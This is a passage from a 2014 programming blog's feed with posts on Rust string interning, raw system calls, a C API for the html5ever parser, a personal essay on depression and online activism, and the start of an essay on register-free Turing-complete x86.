distracted :)</p> <p>Rust catches these mistakes at compile time, and produces the same code you&#39;d see with equivalent constructs in C++. For a more in-depth comparison, see Ruud van Asseldonk&#39;s <a href="http://ruudvanasseldonk.com/2014/08/10/writing-a-path-tracer-in-rust-part-1">excellent series of articles</a>about porting a spectral path tracer from C++ to Rust. The Rust code <a href="http://ruudvanasseldonk.com/2014/10/20/writing-a-path-tracer-in-rust-part-7-conclusion">performs</a> basically the same as Clang / GCC / MSVC on the same platform. Not surprising, because Rust uses <a href="http://llvm.org/">LLVM</a>and benefits from the same backend optimizations as Clang.</p> <p><code>lazy_static!</code> is not a built-in language feature; it&#39;s a <a href="http://doc.rust-lang.org/guide-macros.html">macro</a> provided by <a href="https://github.com/Kimundi/lazy-static.rs">a third-party library</a>. Since the library uses <a href="http://doc.crates.io/">Cargo</a>, I can include it in my project by adding</p> <pre><code class="language-toml">[dependencies.lazy_static]<br />git = &quot;https://github.com/Kimundi/lazy-static.rs&quot;<br /></code></pre> <p>to <code>Cargo.toml</code> and then adding</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>phase</span>(<span class='ident'>plugin</span>)]</span><br /><span class='kw'>extern</span> <span class='kw'>crate</span> <span class='ident'>lazy_static</span>;<br /></pre> <p>to <code>src/lib.rs</code>. Cargo will automatically fetch and build all dependencies. Code reuse becomes no harder than in your favorite scripting language.</p> <p>Finally, we define a function that pushes a new event onto the vector:</p><pre class='rust '><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>log</span>(<span class='ident'>e</span>: <span class='ident'>Event</span>) {<br /> <span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>push</span>(<span class='ident'>e</span>);<br />}<br /></pre> <p><code>LOG.lock()</code> produces an <a href="http://en.wikipedia.org/wiki/Resource_Acquisition_Is_Initialization">RAII</a> handle that will automatically unlock the mutex when it falls out of scope. In C++ I always hesitate to use temporaries like this because if they&#39;re destroyed too soon, my program will segfault or worse. Rust has compile-time <a href="http://doc.rust-lang.org/guide-lifetimes.html">lifetime checking</a>, so I can do things that <a href="http://www.randomhacks.net/2014/09/19/rust-lifetimes-reckless-cxx/">would be reckless</a> in C++.</p> <p>If you scroll up you&#39;ll see a lot of prose and not a lot of code. That&#39;s because I got a huge amount of functionality for free. Here&#39;s the logging module again:</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>deriving</span>(<span class='ident'>Show</span>)]</span><br /><span class='kw'>pub</span> <span class='kw'>enum</span> <span class='ident'>Event</span> {<br /> <span class='ident'>Intern</span>(<span class='ident'>u64</span>),<br /> <span class='ident'>Insert</span>(<span class='ident'>u64</span>, <span class='ident'>String</span>),<br /> <span class='ident'>Remove</span>(<span class='ident'>u64</span>),<br />}<br /><br /><span class='macro'>lazy_static</span><span class='macro'>!</span> {<br /> <span class='kw'>pub</span> <span class='kw'>static</span> <span class='kw-2'>ref</span> <span class='ident'>LOG</span>: <span class='ident'>Mutex</span><span class='op'>&lt;</span><span class='ident'>Vec</span><span class='op'>&lt;</span><span class='ident'>Event</span><span class='op'>&gt;&gt;</span><br /> <span class='op'>=</span> <span class='ident'>Mutex</span>::<span class='ident'>new</span>(<span class='ident'>Vec</span>::<span class='ident'>with_capacity</span>(<span class='number'>50_000</span>));<br />}<br /><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>log</span>(<span class='ident'>e</span>: <span class='ident'>Event</span>) {<br /> <span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>push</span>(<span class='ident'>e</span>);<br />}<br /></pre> <p>This goes in <code>src/event.rs</code>and we include it from <code>src/lib.rs</code>.</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>cfg</span>(<span class='ident'>feature</span> <span class='op'>=</span> <span class='string'>&quot;log-events&quot;</span>)]</span><br /><span class='kw'>pub</span> <span class='kw'>mod</span> <span class='ident'>event</span>;<br /></pre> <p>The <a href="http://doc.rust-lang.org/reference.html#conditional-compilation"><code>cfg</code> attribute</a>is how Rust does conditional compilation. Another project can specify</p> <pre><code class="language-toml">[dependencies.string_cache]<br />git = &quot;https://github.com/servo/string-cache&quot;<br />features = [&quot;log-events&quot;]<br /></code></pre> <p>and add code to dump the log:</p><pre class='rust '><br /><span class='kw'>for</span> <span class='ident'>e</span> <span class='kw'>in</span> <span class='ident'>string_cache</span>::<span class='ident'>event</span>::<span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>iter</span>() {<br /> <span class='macro'>println</span><span class='macro'>!</span>(<span class='string'>&quot;{}&quot;</span>, <span class='ident'>e</span>);<br />}<br /></pre> <p>Any project which doesn&#39;t opt in to <code>log-events</code>will see zero impact from any of this.</p> <p>If you&#39;d like to learn Rust, the <a href="http://doc.rust-lang.org/guide.html">Guide</a> is a good place to start. We&#39;re getting <a href="http://blog.rust-lang.org/2014/09/15/Rust-1.0.html">close to 1.0</a>and the important concepts have been stable for a while, but the details of syntax and libraries are still in flux. It&#39;s not too early to learn, but it might be too early to maintain a large library.</p> <p>By the way, here are the events generated by interning the three strings <code>foobarbaz</code> <code>foo</code> <code>blockquote</code>:</p> <pre><code class="language-text">Insert(0x7f1daa023090, foobarbaz)<br />Intern(0x7f1daa023090)<br />Intern(0x6f6f6631)<br />Intern(0xb00000002)<br /></code></pre> <p>There are three different kinds of IDs, indicated by the least significant bits. The first is a pointer into a standard interning table, which is protected by a mutex. The other two are created without synchronization, which improves parallelism between parser threads.</p> <p>In UTF-8, the string <code>foo</code>is smaller than a 64-bit pointer, so we store the characters directly. <code>blockquote</code> is too big for that, but it corresponds to a well-known HTML tag. <code>0xb</code> is the index of <code>blockquote</code> in <a href="https://github.com/servo/string-cache/blob/master/macros/src/atom/data.rs">a static list</a>of strings that are common on the Web. Static atoms can also be used <a href="https://github.com/servo/string-cache/blob/09a935e64248ca70bd6da12f9760a0fec9ea43fd/src/atom.rs#L533-L552">in pattern matching</a>, and LLVM&#39;s optimizations for C&#39;s <code>switch</code> statements will apply.</p>http://mainisusuallyafunction.blogspot.com/2014/10/a-taste-of-rust-yum-for-cc-programmers_29.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-760465688770961358Thu, 18 Sep 2014 00:33:00 +00002014-09-17T17:33:56.578-07:00imadethisrustsystemsRaw system calls for Rust<p>I wrote <a href="https://github.com/kmcallister/syscall.rs">a small library</a> for making raw system calls from Rust programs. It provides a macro that expands into in-line system call instructions, with no run-time dependencies at all. Here's an example:</p><pre class="sourceCode rust"><code class="sourceCode rust"><span class="st">#![feature(phase)]</span><br /><br /><span class="st">#[phase(plugin, link)]</span><br /><span class="kw">extern crate</span> syscall;<br /><br /><span class="kw">fn</span> write(fd: <span class="dt">uint</span>, buf: <span class="ot">&amp;</span>[<span class="dt">u8</span>]) {<br /> <span class="kw">unsafe</span> {<br /> syscall!(WRITE, fd, buf.as_ptr(), buf.len());<br /> }<br />}<br /><br /><span class="kw">fn</span> main() {<br /> write(1, <span class="st">&quot;Hello, world!\n&quot;</span>.as_bytes());<br />}</code></pre><p>Right now it only supports x86-64 Linux, but I'd love to add other platforms. Pull requests are much appreciated. :)</p>http://mainisusuallyafunction.blogspot.com/2014/09/raw-system-calls-for-rust.htmlnoreply@blogger.com (keegan)2tag:blogger.com,1999:blog-1563623855220143059.post-4580674045745301078Thu, 28 Aug 2014 05:45:00 +00002014-08-27T23:18:40.585-07:00html5everimadethismozillarustCalling a Rust library from C (or anything else!)<p>One reason I'm excited about <a href="http://www.rust-lang.org/">Rust</a> is that I can compile Rust code to a simple native-code library, without heavy runtime dependencies, and then call it from any language. Imagine writing performance-critical extensions for Python, Ruby, or Node in a safe, pleasant language that has <a href="http://doc.rust-lang.org/guide-lifetimes.html">static lifetime checking</a>, <a href="http://doc.rust-lang.org/tutorial.html#pattern-matching">pattern matching</a>, a <a href="http://doc.rust-lang.org/guide-macros.html">real macro system</a>, and other goodies like that. For this reason, when I started <a href="https://github.com/kmcallister/html5ever">html5ever</a> some six months ago, I wanted it to be more than another &quot;Foo for BarLang&quot; project. I want it to be <em>the</em> HTML parser of choice, for a wide variety of applications in any language.</p><p>Today I started work in earnest on the C API for html5ever. In only a few hours I had a working demo. And this is a fairly complicated library, with 5,000+ lines of code incorporating</p><ul class="incremental"><li>most of the <a href="http://www.whatwg.org/specs/web-apps/current-work/multipage/syntax.html">hilariously complicated parsing rules</a> in the HTML spec,</li><li>a <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/macros/src/match_token.rs">Rust syntax extension</a> for writing parse rules in a concise form that matches the spec,</li><li>compile-time <a href="https://github.com/sfackler/rust-phf">perfect hash maps</a> for string interning and named characters, and</li><li>lots and lots of generic code — if this library were written in C++, almost all of it would be in header files.</li></ul><p>It's pretty cool that we can use all this machinery from C, or any language that can call C. I'll describe first how to build and use the library, and then I'll talk about the implementation of the C API.</p><p>html5ever (for C or for Rust) is not finished yet, but if you're feeling adventurous, you are welcome to try it out! And I'd love to have more contributors. Let me know <a href="https://github.com/kmcallister/html5ever/issues">on GitHub</a> about any issues you run into.</p><h1 id="using-html5ever-from-c">Using html5ever from C</h1><p>Like most Rust libraries, html5ever builds with <a href="http://crates.io/">Cargo</a>.</p><pre><code>$ git clone https://github.com/kmcallister/html5ever<br />$ cd html5ever<br />$ git checkout dev<br />$ cargo build<br /> Updating git repository `https://github.com/sfackler/rust-phf`<br /> Compiling phf_mac v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)<br /> Compiling html5ever-macros v0.0.0 (file:///tmp/html5ever)<br /> Compiling phf v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)<br /> Compiling html5ever v0.0.0 (file:///tmp/html5ever)</code></pre><p>The C API isn't Cargo-ified yet, so we'll build it using the older Makefile-based system.</p><pre><code>$ mkdir build<br />$ cd build<br />$ ../configure<br />$ make libhtml5ever_for_c.a<br />rustc -D warnings -C rpath -L /tmp/html5ever/target -L /tmp/html5ever/target/deps \<br /> -o libhtml5ever_for_c.a --cfg for_c --crate-type staticlib /tmp/html5ever/src/lib.rs<br />warning: link against the following native artifacts when linking against this static library<br />note: the order and any duplication can be significant on some platforms, and so may need to be preserved<br />note: library: rt<br />note: library: dl<br />note: library: pthread<br />note: library: gcc_s<br />note: library: pthread<br />note: library: c<br />note: library: m</code></pre><p>Now we can build an <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/examples/capi/tokenize.c">example C program</a> using that library, and following the link instructions produced by <code>rustc</code>.</p><pre><code>$ H5E_PATH=/tmp/html5ever<br />$ gcc -Wall -o tokenize tokenize.c -I $H5E_PATH/capi -L $H5E_PATH/build \<br /> -lhtml5ever_for_c -lrt -ldl -lpthread -lgcc_s -lpthread -lc -lm<br /><br />$ ./tokenize &#39;Hello&amp;comma; &lt;i class=excellent&gt;world!&lt;/i&gt;&#39;<br />CHARS : Hello<br />CHARS : ,<br />CHARS : <br />TAG : &lt;i&gt;<br /> ATTR: class=&quot;excellent&quot;<br />CHARS : world!<br />TAG : &lt;/i&gt;</code></pre><p>The build process is pretty standard for C; we just link a <code>.a</code> file and its dependencies. The biggest obstacle right now is that you won't find the Rust compiler in your distro's package manager, because the language is still changing so rapidly. But there's a ton of effort going into stabilizing the language for a Rust 1.0 release this year. It won't be too long before <code>rustc</code> is a reasonable build dependency.</p><p>Let's look at the C client code.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#include &lt;stdio.h&gt;</span><br /><br /><span class="ot">#include &quot;html5ever.h&quot;</span><br /><br /><span class="dt">void</span> put_str(<span class="dt">const</span> <span class="dt">char</span> *x) {<br /> fputs(x, stdout);<br />}<br /><br /><span class="dt">void</span> put_buf(<span class="kw">struct</span> h5e_buf text) {<br /> fwrite(text.data, text.len, <span class="dv">1</span>, stdout);<br />}<br /><br /><span class="dt">void</span> do_start_tag(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name, <span class="dt">int</span> self_closing, size_t num_attrs) {<br /> put_str(<span class="st">&quot;TAG : &lt;&quot;</span>);<br /> put_buf(name);<br /> <span class="kw">if</span> (self_closing) {<br /> putchar(&#39;/&#39;);<br /> }<br /> put_str(<span class="st">&quot;&gt;</span><span class="ch">\n</span><span class="st">&quot;</span>);<br />}<br /><br /><span class="co">// ...</span><br /><br /><span class="kw">struct</span> h5e_token_ops ops = {<br /> .do_chars = do_chars,<br /> .do_start_tag = do_start_tag,<br /> .do_tag_attr = do_tag_attr,<br /> .do_end_tag = do_end_tag,<br />};<br /><br /><span class="kw">struct</span> h5e_token_sink sink = {<br /> .ops = &amp;ops,<br /> .user = NULL,<br />};<br /><br /><span class="dt">int</span> main(<span class="dt">int</span> argc, <span class="dt">char</span> *argv[]) {<br /> <span class="kw">if</span> (argc &lt; <span class="dv">2</span>) {<br /> printf(<span class="st">&quot;Usage: %s &#39;HTML fragment&#39;</span><span class="ch">\n</span><span class="st">&quot;</span>, argv[<span class="dv">0</span>]);<br /> <span class="kw">return</span> <span class="dv">1</span>;<br /> }<br /><br /> <span class="kw">struct</span> h5e_tokenizer *tok = h5e_tokenizer_new(&amp;sink);<br /> h5e_tokenizer_feed(tok, h5e_buf_from_cstr(argv[<span class="dv">1</span>]));<br /> h5e_tokenizer_end(tok);<br /> h5e_tokenizer_free(tok);<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}</code></pre><p>The <code>struct h5e_token_ops</code> contains pointers to callbacks. Any events we don't care to handle are left as NULL function pointers. Inside <code>main</code>, we create a tokenizer and feed it a string. html5ever for C uses a simple pointer+length representation of buffers, which is this <code>struct h5e_buf</code> you see being passed by value.</p><p>This demo only does tokenization, not tree construction. html5ever can perform both phases of parsing, but the API surface for tree construction is much larger and I didn't get around to writing C bindings yet.</p><h1 id="implementing-the-c-api">Implementing the C API</h1><p>Some parts of Rust's <a href="http://doc.rust-lang.org/std/index.html"><code>libstd</code></a> depend on runtime services, such as task-local data, that a C program may not have initialized. So the <a href="https://github.com/kmcallister/html5ever/commit/222affd0caa132eabb1f14f47b489c161f968b42">first step</a> in building a C API was to eliminate all <code>std::</code> imports. This isn't nearly as bad as it sounds, because large parts of <code>libstd</code> are just re-exports from other libraries like <a href="http://doc.rust-lang.org/core/index.html"><code>libcore</code></a> that we can use with no trouble. To be fair, I did write html5ever with the goal of a C API in mind, and I avoided features like threading that would be difficult to integrate. So your library might give you more trouble, depending on which Rust features you use.</p><p>The <a href="https://github.com/kmcallister/html5ever/commit/c30deff17923294c39890986099e3ead64be29e3">next step</a> was to add the <code>#![no_std]</code> crate attribute. This means we no longer import <a href="http://doc.rust-lang.org/std/prelude/index.html">the standard prelude</a> into every module. To compensate, I added <code>use core::prelude::*;</code> to most of my modules. This brings in <a href="http://doc.rust-lang.org/core/prelude/index.html">the parts of the prelude</a> that can be used without runtime system support. I also added many imports for ubiquitous types like <code>String</code> and <code>Vec</code>, which come from <code>libcollections</code>.</p><p>After that I had to <a href="https://github.com/kmcallister/html5ever/commit/89f2f45af0425271d4c79a73f00fd42eca00dad8">get rid of the last references to <code>libstd</code></a>. The biggest obstacle here involved macros and <a href="http://doc.rust-lang.org/tutorial.html#deriving-implementations-for-traits"><code>deriving</code></a>, which would produce references to names under <code>std::</code>. To work around this, I create <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/lib.rs#L87-L93">a fake little <code>mod std</code></a> which re-exports the necessary parts of <code>core</code> and <code>collections</code>. This is similar to <a href="https://github.com/rust-lang/rust/blob/0d3bd7720c50e3ada4bac77331d43926493be4fe/src/libstd/lib.rs#L273-L277"><code>libstd</code>'s &quot;curious inner-module&quot;</a>.</p><p>I also had to remove all uses of <code>format!()</code>, <code>println!()</code>, etc., or move them inside <code>#[cfg(not(for_c))]</code>. I needed to <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/macros.rs#L59-L69">copy in the <code>vec!()</code> macro</a> which is only provided by <code>libstd</code>, even though the <code>Vec</code> type is provided by <code>libcollections</code>. And I had to omit debug log messages when building for C; I did this with <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/macros.rs#L71-L90">conditionally-defined macros</a>.</p><p>With all this preliminary work done, it was time to write <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs">the C bindings</a>. Here's how the struct of function pointers looks on the Rust side:</p><pre class="rust"><code>#[repr(C)]<br />pub struct h5e_token_ops {<br /> do_start_tag: extern &quot;C&quot; fn(user: *mut c_void, name: h5e_buf,<br /> self_closing: c_int, num_attrs: size_t),<br /> <br /> do_tag_attr: extern &quot;C&quot; fn(user: *mut c_void, name: h5e_buf,<br /> value: h5e_buf),<br /><br /> do_end_tag: extern &quot;C&quot; fn(user: *mut c_void, name: h5e_buf),<br /><br /> // ...<br />}</code></pre><p>The <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L49-L111">processing of tokens</a> is straightforward. We pattern-match and then call the appropriate function pointer, <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L53">unless</a> that pointer is NULL. (<b>Edit:</b> eddyb points out that storing NULL as an <code>extern "C" fn</code> is undefined behavior. Better to use <code>Option&lt;extern "C" fn ...&gt;</code>, which will optimize to the same one-word representation.) </p><p>To <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L115-L122">create a tokenizer</a>, we heap-allocate the Rust data structure in a <a href="http://doc.rust-lang.org/alloc/boxed/index.html"><code>Box</code></a>, and then <a href="http://doc.rust-lang.org/core/intrinsics/ffi.transmute.html">transmute</a> that to a raw C pointer. When the C client calls <code>h5e_tokenizer_free</code>, we transmute this pointer back to a box and <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L126">drop it</a>, which will invoke destructors and finally free the memory.</p><p>You'll note that the functions exported to C have several special annotations:</p><ul class="incremental"><li><code>#[no_mangle]</code>: skip <a href="http://en.wikipedia.org/wiki/Name_mangling">name mangling</a>, so we end up with a linker symbol named <code>h5e_tokenizer_free</code> instead of <code>_ZN5for_c9tokenizer18h5e_tokenizer_free</code>.</li><li><code>unsafe</code>: don't let Rust code call these functions unless it <a href="http://doc.rust-lang.org/rust.html#unsafe-blocks">promises to be careful</a>.</li><li><code>extern &quot;C&quot;</code>: make sure the exported function has a C-compatible <a href="http://en.wikipedia.org/wiki/Application_binary_interface">ABI</a>. The data structures similarly get a <code>#[repr(C)]</code> attribute.</li></ul><p>Then I wrote a <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/capi/html5ever.h">C header file</a> matching this ABI:</p><pre class="sourceCode c"><code class="sourceCode c"><span class="kw">struct</span> h5e_buf {<br /> <span class="dt">unsigned</span> <span class="dt">char</span> *data;<br /> size_t len;<br />};<br /><br /><span class="kw">struct</span> h5e_buf h5e_buf_from_cstr(<span class="dt">const</span> <span class="dt">char</span> *str);<br /><br /><span class="kw">struct</span> h5e_token_ops {<br /> <span class="dt">void</span> (*do_start_tag)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name,<br /> <span class="dt">int</span> self_closing, size_t num_attrs);<br /><br /> <span class="dt">void</span> (*do_tag_attr)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name,<br /> <span class="kw">struct</span> h5e_buf value);<br /><br /> <span class="dt">void</span> (*do_end_tag)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name);<br /><br /> <span class="co">///</span> ...<br />};<br /><br /><span class="kw">struct</span> h5e_tokenizer;<br /><br /><span class="kw">struct</span> h5e_tokenizer *h5e_tokenizer_new(<span class="kw">struct</span> h5e_token_sink *sink);<br /><span class="dt">void</span> h5e_tokenizer_free(<span class="kw">struct</span> h5e_tokenizer *tok);<br /><span class="dt">void</span> h5e_tokenizer_feed(<span class="kw">struct</span> h5e_tokenizer *tok, <span class="kw">struct</span> h5e_buf buf);<br /><span class="dt">void</span> h5e_tokenizer_end(<span class="kw">struct</span> h5e_tokenizer *tok);</code></pre><p>One remaining issue is that Rust is hard-wired to use <a href="http://www.canonware.com/jemalloc/">jemalloc</a>, so linking html5ever will bring that in alongside the system's libc malloc. Having two separate malloc heaps will likely increase memory consumption, and it prevents us from doing fun things like allocating <code>Box</code>es in Rust that can be used and freed in C. Before Rust can really be a great choice for writing C libraries, we need a better solution for integrating the allocators.</p><p>If you'd like to talk about calling Rust from C, you can find me as <code>kmc</code> in <code>#rust</code> and <code>#rust-internals</code> on <code>irc.mozilla.org</code>. And if you run into any issues with html5ever, do let me know, preferably by <a href="https://github.com/kmcallister/html5ever/issues">opening an issue on GitHub</a>. Happy hacking!</p>http://mainisusuallyafunction.blogspot.com/2014/08/calling-rust-library-from-c-or-anything.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-5769838398217923874Wed, 11 Jun 2014 05:06:00 +00002014-06-10T22:06:50.703-07:00On depression, privilege, and online activism<p>[Content warning: depression, privilege, online activism]</p><p>This isn't a general account of my experiences with depression. Many people have written about that, and I don't have much to add. But there's one aspect that I don't hear about very often. It's something that bothers me a lot, and others have told me that it bothers them too.</p><p>The thing is, I'm not just a person with a mental illness. I'm also a well-off white guy, and I enjoy a whole set of unearned privileges from that. Every day people around the world are harassed, abused, and killed over things I never have to worry about. Even in mundane daily life, most everyone is <a href="http://whatever.scalzi.com/2012/05/15/straight-white-male-the-lowest-difficulty-setting-there-is/">playing on a higher difficulty setting</a> than I ever will.</p><p>I've thought about this a lot over the past few years, and I'm trying to understand how I can help make the world more fair and less oppressive. So I give money and I volunteer a little and I speak up when it seems useful, but mostly I listen. I listen to the experiences of people who are different from me. I try to get some understanding of how they feel and why.</p><p>How is this related to depression? Because the reality of privilege and oppression is fucking depressing. Of course it's depressing to those who are directly harmed. That's a lot of what I read about, and some of the despair transfers to me. But my profiting from the suffering of others in a way that I mostly can't change is also depressing, at least if I make an attempt not to ignore it.</p><p>And my distress over my role in systems of oppression brings its own layer of guilt. People are actually suffering and I feel sorry for myself because I'm dimly aware of it? But this comes from the voice that has always taunted me about depression. “How can you be sad? Your life is great. If you had real problems you wouldn't be so pathetic. You're not really sick. You're just a whiner.”</p><p>All of which is part of the disease. I need to own it and work on it every day. But it seems like every time I read an online discussion about social justice, I take a huge step backwards.</p><p>It's hard to shrug off the “men are horrible” comments when I spend so much effort trying to convince myself that I'm not horrible. When I hear people gloating about delicious white male tears, I think about all the times when I would come home from work and collapse in bed crying. Is this what they want my life to be?</p><p>I can't give myself permission to tune out, because the same people lecture constantly about my obligation to be a good ally, which mostly takes the form of “shut up and listen.” And then when I'm upset by the things they say, the response is “This isn't for you! Why are you listening?”</p><p>A local group, one that had recently invited me to hang out as a guest, retweeted a member's declaration to would-be allies: “We're not friends. Fuck you.” Can you see why it feels like they're trying to hurt me?</p><hr /><p>Let me be clear: I truly don't care if people in a room somewhere are talking about how men are the worst. I don't feel oppressed by it, and I have no desire to argue with it. But I can't handle direct exposure.</p><p>And don't tell me that I'm too stupid to understand why they say these things. I know intellectually that it's not about me. I understand the need to vent and the importance of building solidarity. None of that matters on the emotional level where these comments register like a punch to the gut. I <em>do</em> feel this way, even if I shouldn't and I wish I didn't.</p><p>I'm talking about mental health, triggers, and unintentionally hurtful speech. Does that sound familiar? One reason I was drawn to intersectional feminism is that it seemed to have a good set of ground rules for how to treat everyone decently. But now I feel like I'm excluded from protection. “Men are horrible” is apparently the one form of speech where intent is all that matters, and I'm a bad person if it triggers something. I've been told it's offensive that I would even try to describe my experience in those terms.</p><p>It hurts a whole lot to try and really feel someone's pain, and then realize they don't even <em>slightly</em> give a shit about me. It hurts even more when they'll bend over backwards for anyone <em>except</em> me.</p><p>Look, I get it. You argue all the time with trolls who claim that men have it just as bad as women and will shout “what about the men” as a way to disrupt any discussion. When you're engaged in meme warfare, you can't show them any human empathy. They certainly wouldn't return the favor. And if my voice sounds a little like theirs, that's just too bad for me.</p><p>I know that this article will serve as ammunition for some people with views I find disgusting. That sucks, but I'm done using political strategy as a reason to stay silent. I understand tone policing as a derailing tactic, and I understand the need to call it out. But at this point it seems there's no room for a sincere request for kindness, especially coming from someone who doesn't get much benefit of the doubt. (The Geek Feminism Wiki <a href="http://geekfeminism.wikia.com/wiki/Tone_argument?oldid=23472#Civility">basically says</a> that asking for kindness is tone policing if and only if you're a man.)</p><p>I'm not trying to silence anyone here. I'm not jumping in and derailing an existing conversation. I'm writing on my own blog, on my own schedule, about my own feelings. But I'm told that even this is crossing a line.</p><p>I know that I can't dictate how others feel about our fucked-up world. Does that mean I must absolutely suppress the way I feel? Even when we agree about the substance of what's wrong? I know that if I ask someone to share their life experiences, they have a right to express anger. When does expressing anger become sustained, deliberate cruelty?</p><p>“People are being oppressed and you're asking us to care about your feelings?” Yes, I am asking you to care. Just a little bit. I don't claim that my feelings should be a top priority. I hope it wouldn't come up very often. But according to the outspoken few who <a href="http://www.smbc-comics.com/?id=2939">set the tone</a>, I'm <em>never</em> allowed to bring it up. I don't deserve to ask them to be nice.</p><p>And that's why I can no longer have anything to do with this movement. It's really that simple. I guess it says something about my state of mind that I felt the need to attach 1,700 words of preemptive defenses.</p><hr /><p>The truth is, when I'm not allowed to say or even think “not all men,” part of me hears “Yes, all men, especially you.” And if I'm ever confused about whether I'm allowed to say “not all men,” there are a dozen unprompted reminders every day. Little jokes, repeated constantly to set the climate about what will and won't be tolerated.</p><p>When you treat me like one of the trolls, I start to believe that I am one. Guys who say “I support feminism but sometimes they go too far” are usually trying to excuse sexist behavior. So what do I conclude about myself when I have the same thought?</p><p>I get that “ally” is not a label you self-apply, it's a thing you do, and the label comes from others. The problem is, if a hundred people say I'm a good ally, and one person says I'm a sexist asshole, who do you think I'm going to believe?</p><p>I'm not allowed to stand up for myself, because doing so is automatically an act of oppression. If a woman treats me like shit, and she's being “more feminist” than me, I conclude that I deserve to be treated like shit. That is the model I've learned of a good ally.</p><p>I'm not a good ally, or even a bad one. I'm collateral damage.</p><p>If the point of all this is to give me a tiny little taste of the invalidation that others experience on a regular basis, then congratulations, it worked. You've made your point. Now that you've broken me, how can I possibly help you, when it seems like I'm part of the problem just by existing? It feels like all I can do is engage in emotional self-harm to repay the debt of how I was born.</p><p>I can't just take a break “until I feel better.” My depressive symptoms will always come and go, and some thoughts will reliably bring them back. I spent years reading about how the most important thing I can do, as a winner of the birth lottery, is to be an ally to marginalized people. And now I've realized that I'm too sick and weak to do it.</p><p>Even if I give up on being an ally, I can't avoid this subject. It affects a lot of my friends, and I feel even worse when I ask them not to talk about it around me. I don't want to silence anyone. At least I've mostly stopped using Twitter.</p><p>So this is how I feel, but I'm not sure anyone else can do anything about it. Really, most of the people I've talked to have been sympathetic. Maybe I need to learn not to let bullies get to me, even when they're bullying in service of a cause I support. They don't seem to get much pushback from the wider community, at any rate.</p><p>What gives me hope is, I recognize that my participation in the endless shouting online wasn't really useful to anyone. If I can let myself ignore all that, maybe I can recover some of my energy for other activities that actually help people.</p><p>That's all I have to say right now. Thank you for listening to me.</p>http://mainisusuallyafunction.blogspot.com/2014/06/on-depression-privilege-and-online.htmlnoreply@blogger.com (keegan)tag:blogger.com,1999:blog-1563623855220143059.post-5524507829526012603Wed, 12 Feb 2014 05:50:00 +00002014-02-11T21:50:25.291-08:00x86 is Turing-complete with no registers<p><em>In which x86 has too many registers after all.</em></p><h1 id="introduction">Introduction</h1><p>The fiendish complexity of the x86 instruction set means that even bizarrely restricted subsets are capable of arbitrary computation. As others have shown, we can compute using <a href="http://www.phrack.org/issues.html?issue=57&amp;id=15#article">alphanumeric machine code</a> or <a href="http://www.cs.jhu.edu/~sam/ccs243-mason.pdf">English sentences</a>, using <a href="http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf">only the <code>mov</code> instruction</a>, or <a href="https://github.com/jbangert/trapcc">using the MMU</a> as it handles a never-ending double-fault. Here is my contribution to this genre of <a href="http://esolangs.org/wiki/Turing_tarpit">Turing tarpit</a>: x86 is <a href="http://esolangs.org/wiki/Turing-complete">Turing-complete</a> with no registers.</p><h1 id="no-registers">No registers?</h1><p>What do I mean by &quot;no registers&quot;? Well, really just whatever makes the puzzle interesting, but the basic guideline is:</p><blockquote><p>No instruction's observable behavior can depend on the contents of any ordinary user-space register.</p></blockquote><p>So we can't read from <code>R[ABCD]X</code>, <code>R[SD]I</code>, <code>R[SB]P</code> (that's right, no stack), <code>R8</code>-<code>R15</code>, any of their smaller sub-registers, or any of the x87 / MMX / SSE registers. This forbids implicit register access like <code>push</code> or <code>movsb</code> as well as explicit operands. I think I would allow <code>RIP</code>-relative addressing, but it's probably not useful when you're building a single executable which loads at a fixed address.</p><p>We also can't use the condition flags in <code>EFLAGS</code>, so conditional jumps and moves are right out. Many instructions will set these flags, but those dead stores are okay by me.</p><p>All memory access depends on segment selectors, the page table base in <code>CR3</code>, and so on. We trust that the OS (Linux in my example) has set up a reasonable flat memory model, and we shouldn't try to modify that. Likewise there are debug registers, parts of <code>EFLAGS</code> (such as the trap bit), and numerous <a href="http://wiki.osdev.org/Model_Specific_Registers">MSRs</a> which can influence the execution of nearly any instruction. We ignore all that too. Basically, the parts of CPU state which normal user-space code doesn't touch are treated as constants.</p><p>So what's left that we can work with? Just</p><ul class="incremental"><li>the instruction pointer,</li><li>memory operands, 